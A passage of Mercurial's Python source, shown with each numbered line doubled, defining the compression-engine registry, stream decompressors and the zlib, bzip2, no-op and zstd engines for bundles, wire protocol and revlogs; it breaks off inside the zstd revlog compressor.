3276
3276
3277 self._bundletypes[bundletype] = name
3277 self._bundletypes[bundletype] = name
3278
3278
3279 wiresupport = engine.wireprotosupport()
3279 wiresupport = engine.wireprotosupport()
3280 if wiresupport:
3280 if wiresupport:
3281 wiretype = wiresupport.name
3281 wiretype = wiresupport.name
3282 if wiretype in self._wiretypes:
3282 if wiretype in self._wiretypes:
3283 raise error.Abort(_('wire protocol compression %s already '
3283 raise error.Abort(_('wire protocol compression %s already '
3284 'registered by %s') %
3284 'registered by %s') %
3285 (wiretype, self._wiretypes[wiretype]))
3285 (wiretype, self._wiretypes[wiretype]))
3286
3286
3287 self._wiretypes[wiretype] = name
3287 self._wiretypes[wiretype] = name
3288
3288
3289 revlogheader = engine.revlogheader()
3289 revlogheader = engine.revlogheader()
3290 if revlogheader and revlogheader in self._revlogheaders:
3290 if revlogheader and revlogheader in self._revlogheaders:
3291 raise error.Abort(_('revlog header %s already registered by %s') %
3291 raise error.Abort(_('revlog header %s already registered by %s') %
3292 (revlogheader, self._revlogheaders[revlogheader]))
3292 (revlogheader, self._revlogheaders[revlogheader]))
3293
3293
3294 if revlogheader:
3294 if revlogheader:
3295 self._revlogheaders[revlogheader] = name
3295 self._revlogheaders[revlogheader] = name
3296
3296
3297 self._engines[name] = engine
3297 self._engines[name] = engine
3298
3298
3299 @property
3299 @property
3300 def supportedbundlenames(self):
3300 def supportedbundlenames(self):
3301 return set(self._bundlenames.keys())
3301 return set(self._bundlenames.keys())
3302
3302
3303 @property
3303 @property
3304 def supportedbundletypes(self):
3304 def supportedbundletypes(self):
3305 return set(self._bundletypes.keys())
3305 return set(self._bundletypes.keys())
3306
3306
3307 def forbundlename(self, bundlename):
3307 def forbundlename(self, bundlename):
3308 """Obtain a compression engine registered to a bundle name.
3308 """Obtain a compression engine registered to a bundle name.
3309
3309
3310 Will raise KeyError if the bundle type isn't registered.
3310 Will raise KeyError if the bundle type isn't registered.
3311
3311
3312 Will abort if the engine is known but not available.
3312 Will abort if the engine is known but not available.
3313 """
3313 """
3314 engine = self._engines[self._bundlenames[bundlename]]
3314 engine = self._engines[self._bundlenames[bundlename]]
3315 if not engine.available():
3315 if not engine.available():
3316 raise error.Abort(_('compression engine %s could not be loaded') %
3316 raise error.Abort(_('compression engine %s could not be loaded') %
3317 engine.name())
3317 engine.name())
3318 return engine
3318 return engine
3319
3319
3320 def forbundletype(self, bundletype):
3320 def forbundletype(self, bundletype):
3321 """Obtain a compression engine registered to a bundle type.
3321 """Obtain a compression engine registered to a bundle type.
3322
3322
3323 Will raise KeyError if the bundle type isn't registered.
3323 Will raise KeyError if the bundle type isn't registered.
3324
3324
3325 Will abort if the engine is known but not available.
3325 Will abort if the engine is known but not available.
3326 """
3326 """
3327 engine = self._engines[self._bundletypes[bundletype]]
3327 engine = self._engines[self._bundletypes[bundletype]]
3328 if not engine.available():
3328 if not engine.available():
3329 raise error.Abort(_('compression engine %s could not be loaded') %
3329 raise error.Abort(_('compression engine %s could not be loaded') %
3330 engine.name())
3330 engine.name())
3331 return engine
3331 return engine
3332
3332
3333 def supportedwireengines(self, role, onlyavailable=True):
3333 def supportedwireengines(self, role, onlyavailable=True):
3334 """Obtain compression engines that support the wire protocol.
3334 """Obtain compression engines that support the wire protocol.
3335
3335
3336 Returns a list of engines in prioritized order, most desired first.
3336 Returns a list of engines in prioritized order, most desired first.
3337
3337
3338 If ``onlyavailable`` is set, filter out engines that can't be
3338 If ``onlyavailable`` is set, filter out engines that can't be
3339 loaded.
3339 loaded.
3340 """
3340 """
3341 assert role in (SERVERROLE, CLIENTROLE)
3341 assert role in (SERVERROLE, CLIENTROLE)
3342
3342
3343 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3343 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3344
3344
3345 engines = [self._engines[e] for e in self._wiretypes.values()]
3345 engines = [self._engines[e] for e in self._wiretypes.values()]
3346 if onlyavailable:
3346 if onlyavailable:
3347 engines = [e for e in engines if e.available()]
3347 engines = [e for e in engines if e.available()]
3348
3348
3349 def getkey(e):
3349 def getkey(e):
3350 # Sort first by priority, highest first. In case of tie, sort
3350 # Sort first by priority, highest first. In case of tie, sort
3351 # alphabetically. This is arbitrary, but ensures output is
3351 # alphabetically. This is arbitrary, but ensures output is
3352 # stable.
3352 # stable.
3353 w = e.wireprotosupport()
3353 w = e.wireprotosupport()
3354 return -1 * getattr(w, attr), w.name
3354 return -1 * getattr(w, attr), w.name
3355
3355
3356 return list(sorted(engines, key=getkey))
3356 return list(sorted(engines, key=getkey))
3357
3357
3358 def forwiretype(self, wiretype):
3358 def forwiretype(self, wiretype):
3359 engine = self._engines[self._wiretypes[wiretype]]
3359 engine = self._engines[self._wiretypes[wiretype]]
3360 if not engine.available():
3360 if not engine.available():
3361 raise error.Abort(_('compression engine %s could not be loaded') %
3361 raise error.Abort(_('compression engine %s could not be loaded') %
3362 engine.name())
3362 engine.name())
3363 return engine
3363 return engine
3364
3364
3365 def forrevlogheader(self, header):
3365 def forrevlogheader(self, header):
3366 """Obtain a compression engine registered to a revlog header.
3366 """Obtain a compression engine registered to a revlog header.
3367
3367
3368 Will raise KeyError if the revlog header value isn't registered.
3368 Will raise KeyError if the revlog header value isn't registered.
3369 """
3369 """
3370 return self._engines[self._revlogheaders[header]]
3370 return self._engines[self._revlogheaders[header]]
3371
3371
3372 compengines = compressormanager()
3372 compengines = compressormanager()
3373
3373
3374 class compressionengine(object):
3374 class compressionengine(object):
3375 """Base class for compression engines.
3375 """Base class for compression engines.
3376
3376
3377 Compression engines must implement the interface defined by this class.
3377 Compression engines must implement the interface defined by this class.
3378 """
3378 """
3379 def name(self):
3379 def name(self):
3380 """Returns the name of the compression engine.
3380 """Returns the name of the compression engine.
3381
3381
3382 This is the key the engine is registered under.
3382 This is the key the engine is registered under.
3383
3383
3384 This method must be implemented.
3384 This method must be implemented.
3385 """
3385 """
3386 raise NotImplementedError()
3386 raise NotImplementedError()
3387
3387
3388 def available(self):
3388 def available(self):
3389 """Whether the compression engine is available.
3389 """Whether the compression engine is available.
3390
3390
3391 The intent of this method is to allow optional compression engines
3391 The intent of this method is to allow optional compression engines
3392 that may not be available in all installations (such as engines relying
3392 that may not be available in all installations (such as engines relying
3393 on C extensions that may not be present).
3393 on C extensions that may not be present).
3394 """
3394 """
3395 return True
3395 return True
3396
3396
3397 def bundletype(self):
3397 def bundletype(self):
3398 """Describes bundle identifiers for this engine.
3398 """Describes bundle identifiers for this engine.
3399
3399
3400 If this compression engine isn't supported for bundles, returns None.
3400 If this compression engine isn't supported for bundles, returns None.
3401
3401
3402 If this engine can be used for bundles, returns a 2-tuple of strings of
3402 If this engine can be used for bundles, returns a 2-tuple of strings of
3403 the user-facing "bundle spec" compression name and an internal
3403 the user-facing "bundle spec" compression name and an internal
3404 identifier used to denote the compression format within bundles. To
3404 identifier used to denote the compression format within bundles. To
3405 exclude the name from external usage, set the first element to ``None``.
3405 exclude the name from external usage, set the first element to ``None``.
3406
3406
3407 If bundle compression is supported, the class must also implement
3407 If bundle compression is supported, the class must also implement
3408 ``compressstream`` and `decompressorreader``.
3408 ``compressstream`` and `decompressorreader``.
3409
3409
3410 The docstring of this method is used in the help system to tell users
3410 The docstring of this method is used in the help system to tell users
3411 about this engine.
3411 about this engine.
3412 """
3412 """
3413 return None
3413 return None
3414
3414
3415 def wireprotosupport(self):
3415 def wireprotosupport(self):
3416 """Declare support for this compression format on the wire protocol.
3416 """Declare support for this compression format on the wire protocol.
3417
3417
3418 If this compression engine isn't supported for compressing wire
3418 If this compression engine isn't supported for compressing wire
3419 protocol payloads, returns None.
3419 protocol payloads, returns None.
3420
3420
3421 Otherwise, returns ``compenginewireprotosupport`` with the following
3421 Otherwise, returns ``compenginewireprotosupport`` with the following
3422 fields:
3422 fields:
3423
3423
3424 * String format identifier
3424 * String format identifier
3425 * Integer priority for the server
3425 * Integer priority for the server
3426 * Integer priority for the client
3426 * Integer priority for the client
3427
3427
3428 The integer priorities are used to order the advertisement of format
3428 The integer priorities are used to order the advertisement of format
3429 support by server and client. The highest integer is advertised
3429 support by server and client. The highest integer is advertised
3430 first. Integers with non-positive values aren't advertised.
3430 first. Integers with non-positive values aren't advertised.
3431
3431
3432 The priority values are somewhat arbitrary and only used for default
3432 The priority values are somewhat arbitrary and only used for default
3433 ordering. The relative order can be changed via config options.
3433 ordering. The relative order can be changed via config options.
3434
3434
3435 If wire protocol compression is supported, the class must also implement
3435 If wire protocol compression is supported, the class must also implement
3436 ``compressstream`` and ``decompressorreader``.
3436 ``compressstream`` and ``decompressorreader``.
3437 """
3437 """
3438 return None
3438 return None
3439
3439
3440 def revlogheader(self):
3440 def revlogheader(self):
3441 """Header added to revlog chunks that identifies this engine.
3441 """Header added to revlog chunks that identifies this engine.
3442
3442
3443 If this engine can be used to compress revlogs, this method should
3443 If this engine can be used to compress revlogs, this method should
3444 return the bytes used to identify chunks compressed with this engine.
3444 return the bytes used to identify chunks compressed with this engine.
3445 Else, the method should return ``None`` to indicate it does not
3445 Else, the method should return ``None`` to indicate it does not
3446 participate in revlog compression.
3446 participate in revlog compression.
3447 """
3447 """
3448 return None
3448 return None
3449
3449
3450 def compressstream(self, it, opts=None):
3450 def compressstream(self, it, opts=None):
3451 """Compress an iterator of chunks.
3451 """Compress an iterator of chunks.
3452
3452
3453 The method receives an iterator (ideally a generator) of chunks of
3453 The method receives an iterator (ideally a generator) of chunks of
3454 bytes to be compressed. It returns an iterator (ideally a generator)
3454 bytes to be compressed. It returns an iterator (ideally a generator)
3455 of bytes of chunks representing the compressed output.
3455 of bytes of chunks representing the compressed output.
3456
3456
3457 Optionally accepts an argument defining how to perform compression.
3457 Optionally accepts an argument defining how to perform compression.
3458 Each engine treats this argument differently.
3458 Each engine treats this argument differently.
3459 """
3459 """
3460 raise NotImplementedError()
3460 raise NotImplementedError()
3461
3461
3462 def decompressorreader(self, fh):
3462 def decompressorreader(self, fh):
3463 """Perform decompression on a file object.
3463 """Perform decompression on a file object.
3464
3464
3465 Argument is an object with a ``read(size)`` method that returns
3465 Argument is an object with a ``read(size)`` method that returns
3466 compressed data. Return value is an object with a ``read(size)`` that
3466 compressed data. Return value is an object with a ``read(size)`` that
3467 returns uncompressed data.
3467 returns uncompressed data.
3468 """
3468 """
3469 raise NotImplementedError()
3469 raise NotImplementedError()
3470
3470
3471 def revlogcompressor(self, opts=None):
3471 def revlogcompressor(self, opts=None):
3472 """Obtain an object that can be used to compress revlog entries.
3472 """Obtain an object that can be used to compress revlog entries.
3473
3473
3474 The object has a ``compress(data)`` method that compresses binary
3474 The object has a ``compress(data)`` method that compresses binary
3475 data. This method returns compressed binary data or ``None`` if
3475 data. This method returns compressed binary data or ``None`` if
3476 the data could not be compressed (too small, not compressible, etc).
3476 the data could not be compressed (too small, not compressible, etc).
3477 The returned data should have a header uniquely identifying this
3477 The returned data should have a header uniquely identifying this
3478 compression format so decompression can be routed to this engine.
3478 compression format so decompression can be routed to this engine.
3479 This header should be identified by the ``revlogheader()`` return
3479 This header should be identified by the ``revlogheader()`` return
3480 value.
3480 value.
3481
3481
3482 The object has a ``decompress(data)`` method that decompresses
3482 The object has a ``decompress(data)`` method that decompresses
3483 data. The method will only be called if ``data`` begins with
3483 data. The method will only be called if ``data`` begins with
3484 ``revlogheader()``. The method should return the raw, uncompressed
3484 ``revlogheader()``. The method should return the raw, uncompressed
3485 data or raise a ``StorageError``.
3485 data or raise a ``StorageError``.
3486
3486
3487 The object is reusable but is not thread safe.
3487 The object is reusable but is not thread safe.
3488 """
3488 """
3489 raise NotImplementedError()
3489 raise NotImplementedError()
3490
3490
3491 class _CompressedStreamReader(object):
3491 class _CompressedStreamReader(object):
3492 def __init__(self, fh):
3492 def __init__(self, fh):
3493 if safehasattr(fh, 'unbufferedread'):
3493 if safehasattr(fh, 'unbufferedread'):
3494 self._reader = fh.unbufferedread
3494 self._reader = fh.unbufferedread
3495 else:
3495 else:
3496 self._reader = fh.read
3496 self._reader = fh.read
3497 self._pending = []
3497 self._pending = []
3498 self._pos = 0
3498 self._pos = 0
3499 self._eof = False
3499 self._eof = False
3500
3500
3501 def _decompress(self, chunk):
3501 def _decompress(self, chunk):
3502 raise NotImplementedError()
3502 raise NotImplementedError()
3503
3503
3504 def read(self, l):
3504 def read(self, l):
3505 buf = []
3505 buf = []
3506 while True:
3506 while True:
3507 while self._pending:
3507 while self._pending:
3508 if len(self._pending[0]) > l + self._pos:
3508 if len(self._pending[0]) > l + self._pos:
3509 newbuf = self._pending[0]
3509 newbuf = self._pending[0]
3510 buf.append(newbuf[self._pos:self._pos + l])
3510 buf.append(newbuf[self._pos:self._pos + l])
3511 self._pos += l
3511 self._pos += l
3512 return ''.join(buf)
3512 return ''.join(buf)
3513
3513
3514 newbuf = self._pending.pop(0)
3514 newbuf = self._pending.pop(0)
3515 if self._pos:
3515 if self._pos:
3516 buf.append(newbuf[self._pos:])
3516 buf.append(newbuf[self._pos:])
3517 l -= len(newbuf) - self._pos
3517 l -= len(newbuf) - self._pos
3518 else:
3518 else:
3519 buf.append(newbuf)
3519 buf.append(newbuf)
3520 l -= len(newbuf)
3520 l -= len(newbuf)
3521 self._pos = 0
3521 self._pos = 0
3522
3522
3523 if self._eof:
3523 if self._eof:
3524 return ''.join(buf)
3524 return ''.join(buf)
3525 chunk = self._reader(65536)
3525 chunk = self._reader(65536)
3526 self._decompress(chunk)
3526 self._decompress(chunk)
3527 if not chunk and not self._pending and not self._eof:
3527 if not chunk and not self._pending and not self._eof:
3528 # No progress and no new data, bail out
3528 # No progress and no new data, bail out
3529 return ''.join(buf)
3529 return ''.join(buf)
3530
3530
3531 class _GzipCompressedStreamReader(_CompressedStreamReader):
3531 class _GzipCompressedStreamReader(_CompressedStreamReader):
3532 def __init__(self, fh):
3532 def __init__(self, fh):
3533 super(_GzipCompressedStreamReader, self).__init__(fh)
3533 super(_GzipCompressedStreamReader, self).__init__(fh)
3534 self._decompobj = zlib.decompressobj()
3534 self._decompobj = zlib.decompressobj()
3535 def _decompress(self, chunk):
3535 def _decompress(self, chunk):
3536 newbuf = self._decompobj.decompress(chunk)
3536 newbuf = self._decompobj.decompress(chunk)
3537 if newbuf:
3537 if newbuf:
3538 self._pending.append(newbuf)
3538 self._pending.append(newbuf)
3539 d = self._decompobj.copy()
3539 d = self._decompobj.copy()
3540 try:
3540 try:
3541 d.decompress('x')
3541 d.decompress('x')
3542 d.flush()
3542 d.flush()
3543 if d.unused_data == 'x':
3543 if d.unused_data == 'x':
3544 self._eof = True
3544 self._eof = True
3545 except zlib.error:
3545 except zlib.error:
3546 pass
3546 pass
3547
3547
3548 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3548 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3549 def __init__(self, fh):
3549 def __init__(self, fh):
3550 super(_BZ2CompressedStreamReader, self).__init__(fh)
3550 super(_BZ2CompressedStreamReader, self).__init__(fh)
3551 self._decompobj = bz2.BZ2Decompressor()
3551 self._decompobj = bz2.BZ2Decompressor()
3552 def _decompress(self, chunk):
3552 def _decompress(self, chunk):
3553 newbuf = self._decompobj.decompress(chunk)
3553 newbuf = self._decompobj.decompress(chunk)
3554 if newbuf:
3554 if newbuf:
3555 self._pending.append(newbuf)
3555 self._pending.append(newbuf)
3556 try:
3556 try:
3557 while True:
3557 while True:
3558 newbuf = self._decompobj.decompress('')
3558 newbuf = self._decompobj.decompress('')
3559 if newbuf:
3559 if newbuf:
3560 self._pending.append(newbuf)
3560 self._pending.append(newbuf)
3561 else:
3561 else:
3562 break
3562 break
3563 except EOFError:
3563 except EOFError:
3564 self._eof = True
3564 self._eof = True
3565
3565
3566 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3566 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3567 def __init__(self, fh):
3567 def __init__(self, fh):
3568 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3568 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3569 newbuf = self._decompobj.decompress('BZ')
3569 newbuf = self._decompobj.decompress('BZ')
3570 if newbuf:
3570 if newbuf:
3571 self._pending.append(newbuf)
3571 self._pending.append(newbuf)
3572
3572
3573 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3573 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3574 def __init__(self, fh, zstd):
3574 def __init__(self, fh, zstd):
3575 super(_ZstdCompressedStreamReader, self).__init__(fh)
3575 super(_ZstdCompressedStreamReader, self).__init__(fh)
3576 self._zstd = zstd
3576 self._zstd = zstd
3577 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3577 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3578 def _decompress(self, chunk):
3578 def _decompress(self, chunk):
3579 newbuf = self._decompobj.decompress(chunk)
3579 newbuf = self._decompobj.decompress(chunk)
3580 if newbuf:
3580 if newbuf:
3581 self._pending.append(newbuf)
3581 self._pending.append(newbuf)
3582 try:
3582 try:
3583 while True:
3583 while True:
3584 newbuf = self._decompobj.decompress('')
3584 newbuf = self._decompobj.decompress('')
3585 if newbuf:
3585 if newbuf:
3586 self._pending.append(newbuf)
3586 self._pending.append(newbuf)
3587 else:
3587 else:
3588 break
3588 break
3589 except self._zstd.ZstdError:
3589 except self._zstd.ZstdError:
3590 self._eof = True
3590 self._eof = True
3591
3591
3592 class _zlibengine(compressionengine):
3592 class _zlibengine(compressionengine):
3593 def name(self):
3593 def name(self):
3594 return 'zlib'
3594 return 'zlib'
3595
3595
3596 def bundletype(self):
3596 def bundletype(self):
3597 """zlib compression using the DEFLATE algorithm.
3597 """zlib compression using the DEFLATE algorithm.
3598
3598
3599 All Mercurial clients should support this format. The compression
3599 All Mercurial clients should support this format. The compression
3600 algorithm strikes a reasonable balance between compression ratio
3600 algorithm strikes a reasonable balance between compression ratio
3601 and size.
3601 and size.
3602 """
3602 """
3603 return 'gzip', 'GZ'
3603 return 'gzip', 'GZ'
3604
3604
3605 def wireprotosupport(self):
3605 def wireprotosupport(self):
3606 return compewireprotosupport('zlib', 20, 20)
3606 return compewireprotosupport('zlib', 20, 20)
3607
3607
3608 def revlogheader(self):
3608 def revlogheader(self):
3609 return 'x'
3609 return 'x'
3610
3610
3611 def compressstream(self, it, opts=None):
3611 def compressstream(self, it, opts=None):
3612 opts = opts or {}
3612 opts = opts or {}
3613
3613
3614 z = zlib.compressobj(opts.get('level', -1))
3614 z = zlib.compressobj(opts.get('level', -1))
3615 for chunk in it:
3615 for chunk in it:
3616 data = z.compress(chunk)
3616 data = z.compress(chunk)
3617 # Not all calls to compress emit data. It is cheaper to inspect
3617 # Not all calls to compress emit data. It is cheaper to inspect
3618 # here than to feed empty chunks through generator.
3618 # here than to feed empty chunks through generator.
3619 if data:
3619 if data:
3620 yield data
3620 yield data
3621
3621
3622 yield z.flush()
3622 yield z.flush()
3623
3623
3624 def decompressorreader(self, fh):
3624 def decompressorreader(self, fh):
3625 return _GzipCompressedStreamReader(fh)
3625 return _GzipCompressedStreamReader(fh)
3626
3626
3627 class zlibrevlogcompressor(object):
3627 class zlibrevlogcompressor(object):
3628 def compress(self, data):
3628 def compress(self, data):
3629 insize = len(data)
3629 insize = len(data)
3630 # Caller handles empty input case.
3630 # Caller handles empty input case.
3631 assert insize > 0
3631 assert insize > 0
3632
3632
3633 if insize < 44:
3633 if insize < 44:
3634 return None
3634 return None
3635
3635
3636 elif insize <= 1000000:
3636 elif insize <= 1000000:
3637 compressed = zlib.compress(data)
3637 compressed = zlib.compress(data)
3638 if len(compressed) < insize:
3638 if len(compressed) < insize:
3639 return compressed
3639 return compressed
3640 return None
3640 return None
3641
3641
3642 # zlib makes an internal copy of the input buffer, doubling
3642 # zlib makes an internal copy of the input buffer, doubling
3643 # memory usage for large inputs. So do streaming compression
3643 # memory usage for large inputs. So do streaming compression
3644 # on large inputs.
3644 # on large inputs.
3645 else:
3645 else:
3646 z = zlib.compressobj()
3646 z = zlib.compressobj()
3647 parts = []
3647 parts = []
3648 pos = 0
3648 pos = 0
3649 while pos < insize:
3649 while pos < insize:
3650 pos2 = pos + 2**20
3650 pos2 = pos + 2**20
3651 parts.append(z.compress(data[pos:pos2]))
3651 parts.append(z.compress(data[pos:pos2]))
3652 pos = pos2
3652 pos = pos2
3653 parts.append(z.flush())
3653 parts.append(z.flush())
3654
3654
3655 if sum(map(len, parts)) < insize:
3655 if sum(map(len, parts)) < insize:
3656 return ''.join(parts)
3656 return ''.join(parts)
3657 return None
3657 return None
3658
3658
3659 def decompress(self, data):
3659 def decompress(self, data):
3660 try:
3660 try:
3661 return zlib.decompress(data)
3661 return zlib.decompress(data)
3662 except zlib.error as e:
3662 except zlib.error as e:
3663 raise error.StorageError(_('revlog decompress error: %s') %
3663 raise error.StorageError(_('revlog decompress error: %s') %
3664 stringutil.forcebytestr(e))
3664 stringutil.forcebytestr(e))
3665
3665
3666 def revlogcompressor(self, opts=None):
3666 def revlogcompressor(self, opts=None):
3667 return self.zlibrevlogcompressor()
3667 return self.zlibrevlogcompressor()
3668
3668
3669 compengines.register(_zlibengine())
3669 compengines.register(_zlibengine())
3670
3670
3671 class _bz2engine(compressionengine):
3671 class _bz2engine(compressionengine):
3672 def name(self):
3672 def name(self):
3673 return 'bz2'
3673 return 'bz2'
3674
3674
3675 def bundletype(self):
3675 def bundletype(self):
3676 """An algorithm that produces smaller bundles than ``gzip``.
3676 """An algorithm that produces smaller bundles than ``gzip``.
3677
3677
3678 All Mercurial clients should support this format.
3678 All Mercurial clients should support this format.
3679
3679
3680 This engine will likely produce smaller bundles than ``gzip`` but
3680 This engine will likely produce smaller bundles than ``gzip`` but
3681 will be significantly slower, both during compression and
3681 will be significantly slower, both during compression and
3682 decompression.
3682 decompression.
3683
3683
3684 If available, the ``zstd`` engine can yield similar or better
3684 If available, the ``zstd`` engine can yield similar or better
3685 compression at much higher speeds.
3685 compression at much higher speeds.
3686 """
3686 """
3687 return 'bzip2', 'BZ'
3687 return 'bzip2', 'BZ'
3688
3688
3689 # We declare a protocol name but don't advertise by default because
3689 # We declare a protocol name but don't advertise by default because
3690 # it is slow.
3690 # it is slow.
3691 def wireprotosupport(self):
3691 def wireprotosupport(self):
3692 return compewireprotosupport('bzip2', 0, 0)
3692 return compewireprotosupport('bzip2', 0, 0)
3693
3693
3694 def compressstream(self, it, opts=None):
3694 def compressstream(self, it, opts=None):
3695 opts = opts or {}
3695 opts = opts or {}
3696 z = bz2.BZ2Compressor(opts.get('level', 9))
3696 z = bz2.BZ2Compressor(opts.get('level', 9))
3697 for chunk in it:
3697 for chunk in it:
3698 data = z.compress(chunk)
3698 data = z.compress(chunk)
3699 if data:
3699 if data:
3700 yield data
3700 yield data
3701
3701
3702 yield z.flush()
3702 yield z.flush()
3703
3703
3704 def decompressorreader(self, fh):
3704 def decompressorreader(self, fh):
3705 return _BZ2CompressedStreamReader(fh)
3705 return _BZ2CompressedStreamReader(fh)
3706
3706
3707 compengines.register(_bz2engine())
3707 compengines.register(_bz2engine())
3708
3708
3709 class _truncatedbz2engine(compressionengine):
3709 class _truncatedbz2engine(compressionengine):
3710 def name(self):
3710 def name(self):
3711 return 'bz2truncated'
3711 return 'bz2truncated'
3712
3712
3713 def bundletype(self):
3713 def bundletype(self):
3714 return None, '_truncatedBZ'
3714 return None, '_truncatedBZ'
3715
3715
3716 # We don't implement compressstream because it is hackily handled elsewhere.
3716 # We don't implement compressstream because it is hackily handled elsewhere.
3717
3717
3718 def decompressorreader(self, fh):
3718 def decompressorreader(self, fh):
3719 return _TruncatedBZ2CompressedStreamReader(fh)
3719 return _TruncatedBZ2CompressedStreamReader(fh)
3720
3720
3721 compengines.register(_truncatedbz2engine())
3721 compengines.register(_truncatedbz2engine())
3722
3722
3723 class _noopengine(compressionengine):
3723 class _noopengine(compressionengine):
3724 def name(self):
3724 def name(self):
3725 return 'none'
3725 return 'none'
3726
3726
3727 def bundletype(self):
3727 def bundletype(self):
3728 """No compression is performed.
3728 """No compression is performed.
3729
3729
3730 Use this compression engine to explicitly disable compression.
3730 Use this compression engine to explicitly disable compression.
3731 """
3731 """
3732 return 'none', 'UN'
3732 return 'none', 'UN'
3733
3733
3734 # Clients always support uncompressed payloads. Servers don't because
3734 # Clients always support uncompressed payloads. Servers don't because
3735 # unless you are on a fast network, uncompressed payloads can easily
3735 # unless you are on a fast network, uncompressed payloads can easily
3736 # saturate your network pipe.
3736 # saturate your network pipe.
3737 def wireprotosupport(self):
3737 def wireprotosupport(self):
3738 return compewireprotosupport('none', 0, 10)
3738 return compewireprotosupport('none', 0, 10)
3739
3739
3740 # We don't implement revlogheader because it is handled specially
3740 # We don't implement revlogheader because it is handled specially
3741 # in the revlog class.
3741 # in the revlog class.
3742
3742
3743 def compressstream(self, it, opts=None):
3743 def compressstream(self, it, opts=None):
3744 return it
3744 return it
3745
3745
3746 def decompressorreader(self, fh):
3746 def decompressorreader(self, fh):
3747 return fh
3747 return fh
3748
3748
3749 class nooprevlogcompressor(object):
3749 class nooprevlogcompressor(object):
3750 def compress(self, data):
3750 def compress(self, data):
3751 return None
3751 return None
3752
3752
3753 def revlogcompressor(self, opts=None):
3753 def revlogcompressor(self, opts=None):
3754 return self.nooprevlogcompressor()
3754 return self.nooprevlogcompressor()
3755
3755
3756 compengines.register(_noopengine())
3756 compengines.register(_noopengine())
3757
3757
3758 class _zstdengine(compressionengine):
3758 class _zstdengine(compressionengine):
3759 def name(self):
3759 def name(self):
3760 return 'zstd'
3760 return 'zstd'
3761
3761
3762 @propertycache
3762 @propertycache
3763 def _module(self):
3763 def _module(self):
3764 # Not all installs have the zstd module available. So defer importing
3764 # Not all installs have the zstd module available. So defer importing
3765 # until first access.
3765 # until first access.
3766 try:
3766 try:
3767 from . import zstd
3767 from . import zstd
3768 # Force delayed import.
3768 # Force delayed import.
3769 zstd.__version__
3769 zstd.__version__
3770 return zstd
3770 return zstd
3771 except ImportError:
3771 except ImportError:
3772 return None
3772 return None
3773
3773
3774 def available(self):
3774 def available(self):
3775 return bool(self._module)
3775 return bool(self._module)
3776
3776
3777 def bundletype(self):
3777 def bundletype(self):
3778 """A modern compression algorithm that is fast and highly flexible.
3778 """A modern compression algorithm that is fast and highly flexible.
3779
3779
3780 Only supported by Mercurial 4.1 and newer clients.
3780 Only supported by Mercurial 4.1 and newer clients.
3781
3781
3782 With the default settings, zstd compression is both faster and yields
3782 With the default settings, zstd compression is both faster and yields
3783 better compression than ``gzip``. It also frequently yields better
3783 better compression than ``gzip``. It also frequently yields better
3784 compression than ``bzip2`` while operating at much higher speeds.
3784 compression than ``bzip2`` while operating at much higher speeds.
3785
3785
3786 If this engine is available and backwards compatibility is not a
3786 If this engine is available and backwards compatibility is not a
3787 concern, it is likely the best available engine.
3787 concern, it is likely the best available engine.
3788 """
3788 """
3789 return 'zstd', 'ZS'
3789 return 'zstd', 'ZS'
3790
3790
3791 def wireprotosupport(self):
3791 def wireprotosupport(self):
3792 return compewireprotosupport('zstd', 50, 50)
3792 return compewireprotosupport('zstd', 50, 50)
3793
3793
3794 def revlogheader(self):
3794 def revlogheader(self):
3795 return '\x28'
3795 return '\x28'
3796
3796
3797 def compressstream(self, it, opts=None):
3797 def compressstream(self, it, opts=None):
3798 opts = opts or {}
3798 opts = opts or {}
3799 # zstd level 3 is almost always significantly faster than zlib
3799 # zstd level 3 is almost always significantly faster than zlib
3800 # while providing no worse compression. It strikes a good balance
3800 # while providing no worse compression. It strikes a good balance
3801 # between speed and compression.
3801 # between speed and compression.
3802 level = opts.get('level', 3)
3802 level = opts.get('level', 3)
3803
3803
3804 zstd = self._module
3804 zstd = self._module
3805 z = zstd.ZstdCompressor(level=level).compressobj()
3805 z = zstd.ZstdCompressor(level=level).compressobj()
3806 for chunk in it:
3806 for chunk in it:
3807 data = z.compress(chunk)
3807 data = z.compress(chunk)
3808 if data:
3808 if data:
3809 yield data
3809 yield data
3810
3810
3811 yield z.flush()
3811 yield z.flush()
3812
3812
3813 def decompressorreader(self, fh):
3813 def decompressorreader(self, fh):
3814 return _ZstdCompressedStreamReader(fh, self._module)
3814 return _ZstdCompressedStreamReader(fh, self._module)
3815
3815
3816 class zstdrevlogcompressor(object):
3816 class zstdrevlogcompressor(object):
3817 def __init__(self, zstd, level=3):
3817 def __init__(self, zstd, level=3):
3818 # TODO consider omitting frame magic to save 4 bytes.
3818 # TODO consider omitting frame magic to save 4 bytes.
3819 # This writes content sizes into the frame header. That is
3819 # This writes content sizes into the frame header. That is
3820 # extra storage. But it allows a correct size memory allocation
3820 # extra storage. But it allows a correct size memory allocation
3821 # to hold the result.
3821 # to hold the result.
3822 self._cctx = zstd.ZstdCompressor(level=level)
3822 self._cctx = zstd.ZstdCompressor(level=level)
3823 self._dctx = zstd.ZstdDecompressor()
3823 self._dctx = zstd.ZstdDecompressor()
3824 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3824 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3825 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3825 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3826
3826
3827 def compress(self, data):
3827 def compress(self, data):
3828 insize = len(data)
3828 insize = len(data)
3829 # Caller handles empty input case.
3829 # Caller handles empty input case.
3830 assert insize > 0
3830 assert insize > 0
3831
3831
3832 if insize < 50:
3832 if insize < 50:
3833 return None
3833 return None
3834
3834
3835 elif insize <= 1000000:
3835 elif insize <= 1000000:
3836 compressed = self._cctx.compress(data)
3836 compressed = self._cctx.compress(data)
3837 if len(compressed) < insize:
3837 if len(compressed) < insize:
3838 return compressed
3838 return compressed
